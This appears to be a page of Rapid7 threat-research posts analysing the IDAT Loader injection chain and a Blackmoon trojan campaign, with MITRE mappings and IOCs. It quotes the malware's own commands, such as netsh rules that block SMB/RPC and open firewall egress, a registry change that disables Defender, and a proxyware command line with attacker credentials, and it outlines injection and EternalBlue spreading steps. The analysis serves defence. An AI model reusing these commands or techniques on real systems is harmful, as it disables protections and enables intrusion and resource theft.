Maps a view of the newly created section to the local malicious process with RW protection by using NtMapViewOfSection API call
Maps a view of the previously created section to a remote target process with RX protection by using NtMapViewOfSection API call
Fills the view mapped in the local process with shellcode by using NtWriteVirtualMemory API call
In our case, IDAT loader suspends the main thread on the cmd.exe process by using NtSuspendThread API call and then resumes the thread by using NtResumeThread API call
After completing the injection, the second instance of VMWareHostOpen.exe exits.

Stage 5 - IDAT Loader:

The injected loader code implements the Heaven’s Gate evasion technique in exactly the same way as the IDAT injector did. It retrieves the TCBEDOPKVDTUFUSOCPTRQFD environment variable, and reads the %TEMP%\89680228 file data into the memory. The data is then recursively XORed with the 3D ED C0 D3 key.

The decrypted data seems to contain configuration data, including which process the infostealer should be loaded, which API calls should be dynamically retrieved, additional code,and more. The loader then deletes the initial malicious DLL (vmtools.dll) by using DeleteFileW. The loader finally injects the infostealer code into the explorer.exe process by using the Process Doppelgänging injection technique.

The Process Doppelgänging method utilizes the Transactional NTFS feature within the Windows operating system. This feature is designed to ensure data integrity in the event of unexpected errors. For instance, when an application needs to write or modify a file, there's a risk of data corruption if an error occurs during the write process. To prevent such issues, an application can open the file in a transactional mode to perform the modification and then commit the modification, thereby preventing any potential corruption. The modification either succeeds entirely or does not commence.

Process Doppelgänging exploits this feature to replace a legitimate file with a malicious one, leading to a process injection. The malicious file is created within a transaction, then committed to the legitimate file, and subsequently executed. The Process Doppelgänging in our sample was performed by:

Initiating a transaction by using NtCreateTransaction API call
Creating a new file by using NtCreateFile API call
Writing to the new file by using NtWriteFile API call
Writing malicious code into a section of the local process using NtCreateSection API call
Discarding the transaction by using NtRollbackTransaction API call
Running a new instance of explorer.exe process by using NtCreateProcessEx API call
Running the malicious code inside explorer.exe process by using NtCreateThreadEx API call

If the file created within a transaction is rolled back (instead of committed), but the file section was already mapped into the process memory, the process injection will still be performed.

The final payload injected into the explorer.exe process was identified by Rapid7 as Lumma Stealer.

Throughout the whole attack flow, the malware delays execution by using NtDelayExecution, a technique that is usually used to escape sandboxes.

As previously mentioned, Rapid7 has investigated several IDAT loader samples. The main differences were:

The legitimate software that loads the malicious DLL.
The name of the staging directory created within %APPDATA%.
The process the IDAT injector injects the Loader code to.
The process into which the infostealer/RAT loaded into.
Rapid7 observed the IDAT loader has been used to load the following infostealers and RAT: Stealc, Lumma and Amadey infostealers and SecTop RAT.

Conclusion

IDAT Loader is a new sophisticated loader that utilizes multiple evasion techniques in order to execute various commodity malware including InfoStealers and RAT’s. The Threat Actors behind the Fake Update campaign have been packaging the IDAT Loader into DLLs that are loaded by legitimate programs such as VMWarehost, Python and Windows Defender.

Rapid7 Customers

For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed and alerting on the activity described in this blog:

Attacker Technique - MSIExec loading object via HTTP
Suspicious Process - FSUtil Zeroing Out a File
Suspicious Process - Users Script Spawns Cmd And Redirects Output To Temp File
Suspicious Process - Possible Dropper Script Executed From Users Downloads Directory
Suspicious Process - WScript Runs JavaScript File from Temp Or Download Directory

MITRE ATT&CK Techniques:

Initial Access	Drive-by Compromise (T1189)	The SocGholish Uses Drive-by Compromise technique to target user’s web browser
Defense Evasion	System Binary Proxy Execution: Msiexec (T1218.007)	The ChromeSetup.exe downloader (C9094685AE4851FD5A5B886B73C7B07EFD9B47EA0BDAE3F823D035CF1B3B9E48) downloads and executes .msi file
Execution	User Execution: Malicious File (T1204.002)	Update.msi (53C3982F452E570DB6599E004D196A8A3B8399C9D484F78CDB481C2703138D47) drops and executes VMWareHostOpen.exe
Defense Evasion	Hijack Execution Flow: DLL Search Order Hijacking (T1574.001)	VMWareHostOpen.exe loads a malicious vmtools.dll (931D78C733C6287CEC991659ED16513862BFC6F5E42B74A8A82E4FA6C8A3FE06)
Defense Evasion	Deobfuscate/Decode Files or Information (T1140)	vmtools.dll (931D78C733C6287CEC991659ED16513862BFC6F5E42B74A8A82E4FA6C8A3FE06) decrypts vmo.log(51CEE2DE0EBE01E75AFDEFFE29D48CB4D413D471766420C8B8F9AB08C59977D7) file
Defense Evasion	Masquerading (T1036)	vmo.log(51CEE2DE0EBE01E75AFDEFFE29D48CB4D413D471766420C8B8F9AB08C59977D7) file masqueraded to .png file
Execution	Native API (T1106)	The IDAT injector and IDAT loader are using Heaven’s Gate technique to evade detection
Defense Evasion	Process Injection (T1055)	IDAT injector implements NtCreateSection + NtMapViewOfSection Code Injection technique to inject into cmd.exe process
Defense Evasion	Process Injection: Process Doppelgänging (T1055.013)	IDAT loader implements Process Doppelgänging technique to load the InfoStealer
Defense Evasion	Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003)	Execution delays are performed by several stages throughout the attack flow

IOCs

IOC	SHA-256	Notes
InstaIIer.exe	A0319E612DE3B7E6FBB4B71AA7398266791E50DA0AE373C5870C3DCAA51ABCCF	MSI downloader
ChromeSetup.exe	C9094685AE4851FD5A5B886B73C7B07EFD9B47EA0BDAE3F823D035CF1B3B9E48	MSI downloader
MlcrоsоftЕdgеSеtuр.exe	3BF4B365D61C1E9807D20E71375627450B8FEA1635CB6DDB85F2956E8F6B3EC3	MSI downloader
update.msi	53C3982F452E570DB6599E004D196A8A3B8399C9D484F78CDB481C2703138D47	MSI dropper, dropped pythonw.exe, python311.dll and pz.log files
update.msi	D19C166D0846DDAF1A6D5DBD62C93ACB91956627E47E4E3CBD79F3DFB3E0F002	MSI dropper, dropped VMWareHostOpen.exe, vmtools.dll and vmo.log files
DirectX12AdvancedSupport.msi	B287C0BC239B434B90EEF01BCBD00FF48192B7CBEB540E568B8CDCDC26F90959	MSI dropper, dropped MpCopyAccelerator.exe, MpClient.dll, and virginium.flac file
python311.dll	BE8EB5359185BAA8E456A554A091EC54C8828BB2499FE332E9ECD65639C9A75B	Malicious dll loaded by pythonw.exe
vmtools.dll	931D78C733C6287CEC991659ED16513862BFC6F5E42B74A8A82E4FA6C8A3FE06	Malicious dll loaded by VMWareHostOpen.exe
MpClient.dll	5F57537D18ADCC1142294D7C469F565F359D5FF148E93A15CCBCEB5CA3390DBD	Malicious dll loaded by MpCopyAccelerator.exe
vmo.log	51CEE2DE0EBE01E75AFDEFFE29D48CB4D413D471766420C8B8F9AB08C59977D7	Encrypted payload decrypted by vmtools.dll
pz.log	8CE0901A5CF2D3014AAA89D5B5B68666DA0D42D2294A2F2B7E3A275025B35B79	Encrypted payload decrypted by python311.dll
virginium.flac	B3D8BC93A96C992099D768BEB42202B48A7FE4C9A1E3B391EFBEEB1549EF5039	Encrypted payload decrypted by MpClient.dll
ocmtancmi2c5t[.]xyz		Host of the MSI package
lazagrc3cnk[.]xyz		Host of the MSI package
omdowqind[.]site		Domain that facilitated download of the MSI downloader
weomfewnfnu[.]site		Domain that facilitated download of the MSI downloader
winextrabonus[.]life		Domain that facilitated download of the MSI downloader
bgobgogimrihehmxerreg[.]site		Domain that facilitated download of the MSI downloader
pshkjg[.]db[.]files[.]1drv[.]com		Domain that facilitated download of the MSI downloader
ooinonqnbdqnjdnqwqkdn[.]space		Domain that facilitated download of the MSI downloader
hello-world-broken-dust-1f1c[.]brewasigfi1978[.]workers[.]dev		Domain that facilitated download of the MSI downloader
doorblu[.]xyz		C&C server
costexcise[.]xyz		C&C server
buyerbrand[.]xyz		C&C server
94.228.169[.]55		C&C server
gapi-node[.]io		C&C server
gstatic-node[.]io		C&C server

References:

https://zeltser.com/media/docs/malware-analysis-lab.pdf

Old Blackmoon Trojan, NEW Monetization Approach

Posted 2 years ago by Natalie Zargarov

Rapid7 is tracking a new, more sophisticated and staged campaign using the Blackmoon trojan, which appears to have originated in November 2022. The campaign is actively targeting various businesses primarily in the USA and Canada. However, it is not used to steal credentials, instead it implements different evasion and persistence techniques to drop several unwanted programs and stay in victims’ environment for as long as possible.

Blackmoon, also known as KRBanker, is a banking trojan first spotted in late September 2015 when targeting banks of the Republic of Korea. Back in 2015, it was using a “pharming” technique to steal credentials from targeted victims. This technique involves redirecting traffic to a forged website when a user attempts to access one of the banking sites being targeted by the cyber criminals. The fake server masquerades the original site and urges visitors to submit their information and credentials.

Stage 1 - Blackmoon

Blackmoon trojan was named after a debug string “blackmoon,” that is present in its code:

Blackmoon drops a dll into C:\Windows\Logs folder named RunDllExe.dll and implements a Port Monitors persistence technique. Port Monitors is related to the Windows Print Spooler Service or spoolsv.exe. When adding a printer port monitor a user (or the attacker in our case) has the ability to add an arbitrary dll that acts as the monitor. There are two ways to add a port monitor: via Registry for persistence or via a AddMonitor API call for immediate dll execution.

Our sample implements both, it calls AddMonitor API call to immediately execute RunDllExe.dll:

It also sets a Driver value in HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\RunDllExe registry key to the malicious dll path.

Next, the malware adds a shutdown system privilege to the Spooler service by adding SeShutdownPrivilege to the RequiredPrivileges value of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler registry key.

The malware disables Windows Defender by setting HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware value to “1”.

It also stops and disables “Lanman” service (the service that allows a computer to share files and printers with other devices on the network).

To block all incoming RPC and SMB communication the malware executes the set of following commands:

netsh ipsec static add policy name=Block
netsh ipsec static add filterlist name=Filter1
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
netsh ipsec static add filteraction name=FilteraAtion1 action=block
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
netsh ipsec static set policy name=Block assign=y

The malware sets two additional values under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspnet_staters: Work and Mining, both set to “1”.

Next, the malware checks if one of the following services exists on the victim computer:

clr_optimization_v3.0.50727_32
clr_optimization_v3.0.50727_64
WinHelpsvcs
Services
Help Service
KuGouMusic
WinDefender
Msubridge
ChromeUpdater
MicrosoftMysql
MicrosoftMssql
Conhost
MicrosotMaims
MicrosotMais

In case the service is found, it will be disabled (by setting “Start” value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename to “4”) or deleted by using DeleteService API call.

The malware enumerates running processes by using a combination of CreateToolhelp32Snapshot and Process32First and Process32Next API calls to terminate service’s process if one is running.

Finally, a Powershell command is executed to delete the running process’s file and the malware exits.

Stage 2 - RunDllExe.dll - injector

RunDllExe.dll is executed by Spooler service and is responsible for injecting a next stage payload into the newly executed svchost.exe process. The malware implements Process Hollowing injection technique. The injected code is a C++ file downloader.

Stage 3 - File Downloader

The downloader first checks if ‘Work’ and ‘Mining’ values exist and set under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspnet_staters registry key, if the values do not exist, it will create them and set both to "1".

As downloader, this part of the attack flow is checking if all needed to be downloaded files are already present (by using PathFileExistsA API call) on the PC, if not, the malware sleeps for two minutes before every download and then use the URLDownloadToFileA API call to download the following files:

C:\WINDOWS\Temp\MpMgSvc.dll
C:\WINDOWS\Temp\Hooks.exe
C:\WINDOWS\Temp\MpMgSvc.exe
C:\Windows\Microsoft.NET\Framework\v3.0\WmiPrvSER.exe

After the download all but the MpMgSvc.dll are executed by the downloader:

Stage 4 - Hook.exe - dropper

Hook.exe drops an additional dll to the users roaming folder C:\Users\Username\AppData\Roaming\GraphicsPerfSvcs.dll and creates a new service named GraphicsPerfSvcs, which will be automatically executed at system startup. The service name is almost identical to the legitimate service named GraphicsPerfSvc, which belongs to the Graphics performance monitor service. Naming services and files similarly to the once belonged to OS is an evasion technique widely used by threat actors.

The dropper starts the created service. It then creates and executes a .vbs which responsible for deleting Hook.exe and the .vbs itself:

Stage 4.1 - MpMgSvc.exe - spreader MpMgSvc.exe first creates a new \BaseNamedObjects\Brute_2022 mutex. As being responsible for spreading the malware, it drops Doublepulsar-1.3.1.exe, Eternalblue-2.2.0.exe, Eternalromance-1.4.0.exe and all required for these files libraries into the C:\Windows\Temp folder.

Then it scans the network for PC’s with open 3306, 445, 1433 ports. If any open ports are found, the spreader will attempt to install a backdoor by using EternalBlue and send shellcode to inject dll with Doublepulsar as implemented in the Eternal-Pulsar github project .

There are two dlls dropped, one for x64 architecture and the second one for x86. When injected by Doublepulsar it will download the first stage Blackmoon malware and follow the same execution stages described in this analysis.

Stage 4.2 - WmiPrvSER.exe - XMRig miner

WmiPrvSER.exe is a classic XMRig Monero miner. Our sample is the XMRig version 6.18, and it creates a BaseNamedObjects\\Win__Host mutex on the victim's host. You can find a full report on XMRig here.

Stage 5 - GraphicsPerfSvcs service - dropper

As mentioned in the previous stage, the GraphicsPerfSvcs service will be started automatically at system startup. Every time it runs, it will check if two of the following files exist:

C:\Windows\TEMP\ctfmoon.exe
C:\Windows\Microsoft.NET\traffmonetizer\Traffmonetizer.exe

If not found, it will drop both those files and all needed dlls for their execution.

The dropper also creates two new firewall rules that allow all outbound connections from dropped files by executing the following commands:

netsh advfirewall firewall add rule name=ctfmoon dir=out program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow
netsh advfirewall firewall add rule name=traffmonetizer dir=out program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow

The service stays up and constantly attempts to read from the URL: hxxp://down.ftp21[.]cc/Update.txt. At the time of the analysis, this URL was down so we were not able to observe its content. However, following the service code, it seems to read the URL content and check if it contains one of the following commands:

[Delete File], [Kill Proccess], or [Delete Service], which will delete file, kill process or delete service accordingly.

Stage 6 - Ctfmoon.exe and Traffmonetizer.exe - Traffic Stealers

GraphicsPerfSvcs service executes two dropped files: Ctfmoon.exe and Traffmonetizer.exe, both appeared to be Potentially Unwanted Programs (PUP’s) in the form of traffic stealers. Both software are using the “network bandwidth sharing” monetization scheme to make “passive income”.

Ctfmoon.exe is a cli version of the Iproyal Pawns application. It gets the user email address and password as execution parameters to associate the activity and collect the money to the passed account. GraphicsPerfSvcs executes the following command line to start the Iproyal Pawns: ctfmoon.exe -email=usax138@protonmail.com -password=123456Aa. -device-name=Win32 -accept-tos

We can see that the user mentioned in our execution parameters already made $169:

The Traffmonetizer.exe is similar to Ctfmoon.exe, created by Traffmonetizer. It reads the user account data from a settings.json file dropped in users roaming directory. Our .json file contains the following content:

{"Token":"1gUgURMzQiuGFgttIdjeZBS0G6fqFlVvhCKlqzfHd3o=","StartWithWindows":false,"Accepting":true}.

Conclusion

The analysis in this blog reveals the effort threat actors put into the attack flow, by using several evasion and persistence techniques and using different approaches to increase their income and use victim resources.

MITRE ATT&CK Techniques:

Persistence	Boot or Logon Autostart Execution: Port Monitors (T1547.010)	The Blackmoon trojan (a95737adb2cd7b1af2291d143200a82d8d32 a868c64fb4acc542608f56a0aeda) is using Port Monitors technique to establish persistence on the target host.
Persistence	Create or Modify System Process: Windows Service (T1543.003)	The Hook.exe dropper (1A7A4B5E7C645316A6AD59E26054A95 654615219CC03657D6834C9DA7219E99F) creates a new service to establish persistence on the target host.
Defense Evasion	Process Injection: Process Hollowing (T1055.012)	The dll dropped by Blackmoon (F5D508C816E485E05DF5F58450D623DC6B FA35A2A0682C238286D82B4B476FBB) is using the process hollowing technique to evade endpoint security detection.
Defense Evasion	Impair Defenses: Disable or Modify Tools (T1562.001)	The Blackmoon trojan (a95737adb2cd7b1af2291d143200a82d8 d32a868c64fb4acc542608f56a0aeda) disables Windows Defender to evade end-point security detection.
Lateral Movement	Exploitation of Remote Services (T1210)	The MpMgSvc.exe spreader (72B0DA797EA4FC76BA4DB6AD131056257965D F9B2BCF26CE2189AF3DBEC5B1FC) uses EternalBlue and DoublePulsar to spread in organization’s environment.
Discovery	Network Share Discovery (T1135)	The MpMgSvc.exe spreader (72B0DA797EA4FC76BA4DB6AD131056257965D F9B2BCF26CE2189AF3DBEC5B1FC) scans the network do discover open SMB ports.
Impact	Resource Hijacking (T1496)	The XMRing miner (ECC5A64D97D4ADB41ED9332E4C0F5DC7DC02 A64A77817438D27FC31C69F7C1D3), Iproyal Pawns trafficStealer (FDD762192D351CEA051C0170840F1D8D 171F334F06313A17EBA97CACB5F1E6E1) and Traffmonetizer trafficStealer (2923EACD0C99A2D385F7C989882B7CCA 83BFF133ECF176FDB411F8D17E7EF265) executed to use victim’s resources.
Impact	Service Stop (T1489)	The Blackmoon trojan (a95737adb2cd7b1af2291d143200a82d8d 32a868c64fb4acc542608f56a0aeda) stops updates and security products services.
Command and Control	Application Layer Protocol: Web Protocols (T1071.001)	The downloader (E9A83C8811E7D7A6BF7EA7A656041BCD68968 7F8B23FA7655B28A8053F67BE99) downloads next stage payloads over HTTP protocol. GraphicsPerfSvcs service (5AF88DBDC7F53BA359DDC47C3BCAF3F5FE 9BDE83211A6FF98556AF7E38CDA72B) uses HTTP protocol to get command from C&C server.

IOC’s

File name	SHA-256
445.exe	a95737adb2cd7b1af2291d143200a82 d8d32a868c64fb4acc542608f56a0aeda	Blackmoon Trojan
RunDllExe.dll	F5D508C816E485E05DF5F58450D623DC 6BFA35A2A0682C238286D82B4B476FBB	Injector
Injected code	E9A83C8811E7D7A6BF7EA7A656041BCD 689687F8B23FA7655B28A8053F67BE99	Downloader
MpMgSvc.dll	E9BD4A9C6EA27033BCB696E65D7441DC2D 42CD7F9F02084B5C704316F0A4FDDF
Hooks.exe	1A7A4B5E7C645316A6AD59E26054A95654615 219CC03657D6834C9DA7219E99F	Dropper
MpMgSvc.exe	72B0DA797EA4FC76BA4DB6AD131056257965 DF9B2BCF26CE2189AF3DBEC5B1FC	Spreader
WmiPrvSER.exe	ECC5A64D97D4ADB41ED9332E4C0F5DC7DC02 A64A77817438D27FC31C69F7C1D3	XMRig
GraphicsPerfSvcs.dll	5AF88DBDC7F53BA359DDC47C3BCAF3F5FE9BDE 83211A6FF98556AF7E38CDA72B	Dropper
Doublepulsar-1.3.1.exe	15FFBB8D382CD2FF7B0BD4C87A7C0BFFD1541 C2FE86865AF445123BC0B770D13	Shellcode installer
Eternalblue-2.2.0.exe	85B936960FBE5100C170B777E1647CE9F0F0 1E3AB9742DFC23F37CB0825B30B5	Exploit
Eternalromance-1.4.0.exe	B99C3CC1ACBB085C9A895A8C3510F6DAA F31F0D2D9CCB8477C7FB7119376F57B	Exploit
X64.dll	275A9A7B99F3474CBF8A61964A6022E3CF 7BAF76E0EE2FBA31A708D8F1E25BD0	shellcode
X86.dll	F247A48D3ECDBDF91FCD7A2D8728ADAAF 06149586ADDE62DE7212C6DE645AD58	shellcode
Ctfmoon.exe	FDD762192D351CEA051C0170840F1D8D171 F334F06313A17EBA97CACB5F1E6E1	Iproyal Pawns
Traffmonetizer.exe	2923EACD0C99A2D385F7C989882B7CCA8 3BFF133ECF176FDB411F8D17E7EF265	Traffmonetizer
usax138@protonmail.com		Iproyal Pawns account
1gUgURMzQiuGFgttIdjeZBS0 G6fqFlVvhCKlqzfHd3o=		Traffmonetizer token
hxxp://down.ftp21[.]cc		C&C server

References

https://posts.slayerlabs.com/monitor-persistence/